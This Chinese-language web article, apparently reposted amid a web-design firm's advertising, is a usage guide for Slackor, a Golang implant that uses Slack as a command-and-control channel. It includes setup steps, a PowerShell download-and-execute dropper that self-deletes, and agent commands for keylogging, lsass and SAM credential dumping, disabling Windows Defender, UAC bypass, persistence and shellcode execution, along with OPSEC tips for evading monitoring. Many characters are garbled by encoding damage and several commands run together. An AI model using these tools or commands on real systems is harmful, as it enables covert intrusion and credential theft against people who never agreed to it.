如何將Slack當(dāng)作你的命令控制服務(wù)器，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

創(chuàng)新互聯(lián)公司堅持“要么做到，要么別承諾”的工作理念，服務(wù)領(lǐng)域包括：網(wǎng)站設(shè)計制作、成都網(wǎng)站設(shè)計、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣等服務(wù)，滿足客戶于互聯(lián)網(wǎng)時代的新縣網(wǎng)站設(shè)計、移動媒體設(shè)計的需求，幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡(luò)建設(shè)合作伙伴！

Slackor

Slackor是一款Golang植入，它可以將Slack作為你的命令控制服務(wù)器。

注意：該工具目前僅處于概念驗證模型階段，請在創(chuàng)建任何Slack應(yīng)用之前，確保應(yīng)用符合Slack App開發(fā)者政策。

工具安裝

Slackor服務(wù)器端采用Python 3開發(fā)，在使用該工具之前，你需要滿足以下條件：

1、 一個Slack工作區(qū)；

2、 以下列權(quán)限注冊一個App：

channels:readchannels:historychannels:writefiles:write:userfiles:read

3、 創(chuàng)建一個BOT；

Slackor項目中包含五個文件：

1、install.sh：安裝依賴組件2、setup.py：這個腳本可以創(chuàng)建Slack信道、數(shù)據(jù)庫和植入程序3、agent.py：這個腳本可以生成新的植入程序4、server.py：Slack服務(wù)器，可在Linux平臺上運行5、agent.go：Golang植入程序6、requirements.txt：Python依賴（自動安裝）

快速開始

go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackor

運行了上述命令之后，運行“install.sh”文件，然后運行“setup.py”，此時需要你提供Slack應(yīng)用程序的“OAuth訪問令牌”以及 “Bot User OAuth訪問令牌”。

成功運行上述腳本之后，還需要在項目的dist/目錄中創(chuàng)建下列幾個文件：

agent.windows.exe:Windows 64-bit 代碼agent.upx.exe:Windows 64-bit 代碼, UPX 封裝agent.darwin:macOS 64-bit 代碼agent.32.linux:Linux 32-bit 代碼agent.64.linux:Linux 64-bit 代碼

在Linux主機上運行server.py之后，工具會根據(jù)目標(biāo)主機的情況自動選擇上述代理程序。

我們可以使用“stager”模塊來生成一個one-liner或其他Dropper：

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /msvchost.exe /c C:\Users\Public\[NAME]; timeout 2; delC:\Users\Public\[NAME].exe

這條命令將會執(zhí)行InvokeWebRequest(PS v.3+)來下載Payload，并使用一個LOLBin來執(zhí)行它。執(zhí)行完成后，Payload會進行自毀操作。這只是一個僅供參考的使用樣例，大家可以根據(jù)自己的需要來使用其他的下載方法或執(zhí)行方法。

工具使用

輸入“help”或按下TAB鍵，我們就可以查看到該工具所支持的全部可用命令了，我們還可以輸入“help [COMMAND]”來查看命令描述。

(Slackor：服務(wù)器端)help –顯示幫助菜單interact– 與代理端交互list –列出所有已注冊的代理remove– 終止或移除代理revive– 向所有的代理發(fā)送重新注冊信號stager– 生成一個One-Liner下載并執(zhí)行植入程序quit –退出程序wipefiles– 刪除Slack中的所有上傳文件

當(dāng)代理端就緒之后，我們就可以跟它進行交互了。使用“interact [AGENT]”可以切換到代理端的命令行界面，然后輸入“help”或按下TAB鍵即可查看代理端支持的所有可用命令。

(Slackor：代理端)

常用命令

back –返回主菜單beacon– 修改代理確認(rèn)時間間隔（默認(rèn)為5秒）download– 從代理端下載文件至Slackor服務(wù)器help –顯示幫助菜單kill –終止代理sleep– 代理休眠sysinfo– 顯示當(dāng)前用戶、操作系統(tǒng)版本、系統(tǒng)架構(gòu)和CPU核心數(shù)upload– 從代理端上傳一份文件至Slackor 服務(wù)器wget –通過HTTP/HTTPS獲取任意文件Windows命令bypassuac– 生成一個高完整性的代理cleanup– 移除持久性組件clipboard– 獲取剪切板內(nèi)容defanger– 嘗試關(guān)閉WindowsDefenderduplicate– 生成代理端副本getsystem-使用NTAUTHORITY/SYSTEM權(quán)限生成代理keyscan– 在代理端開啟鍵盤記錄器minidump–導(dǎo)出lsass.exe內(nèi)存信息并下載persist– 在ADS中創(chuàng)建持久性植入程序samdump– 嘗試導(dǎo)出SAM文件，以供離線提取哈希特征screenshot– 獲取屏幕截圖shellcode– 執(zhí)行x64元ShellcodeLinux命令screenshot- 獲取屏幕截圖

OPSEC

命令輸出和下載的文件都采用了AES加密，額外的還有Slack的TLS傳輸層加密。

在執(zhí)行需要向磁盤寫入數(shù)據(jù)的任務(wù)時，模塊會給用戶發(fā)送提醒。在執(zhí)行Shell命令時，cmd.exe/bash將會被執(zhí)行，這種行為可能會被目標(biāo)主機監(jiān)控到。下面給出的是一些OPSEC安全命令，它們不會執(zhí)行cmd.exe/bash。

cat –打印文件內(nèi)容cd – 修改目錄find –搜索目錄文件名getip– 獲取外部IP地址(發(fā)送一個DNS 請求)hostname– 顯示主機名稱ifconfig– 顯示接口信息ls – 列舉目錄內(nèi)容mkdir– 創(chuàng)建一個目錄pwd –輸出當(dāng)前工作目錄rm – 移除一個文件rmdir– 移除一個目錄whoami/ getuid – 輸出當(dāng)前用戶信息

看完上述內(nèi)容，你們掌握如何將Slack當(dāng)作你的命令控制服務(wù)器的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

標(biāo)題名稱：如何將Slack當(dāng)作你的命令控制服務(wù)器
路徑分享：http://aaarwkj.com/article42/pegdhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供品牌網(wǎng)站設(shè)計、動態(tài)網(wǎng)站、網(wǎng)站營銷、Google、商城網(wǎng)站、微信公眾號

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)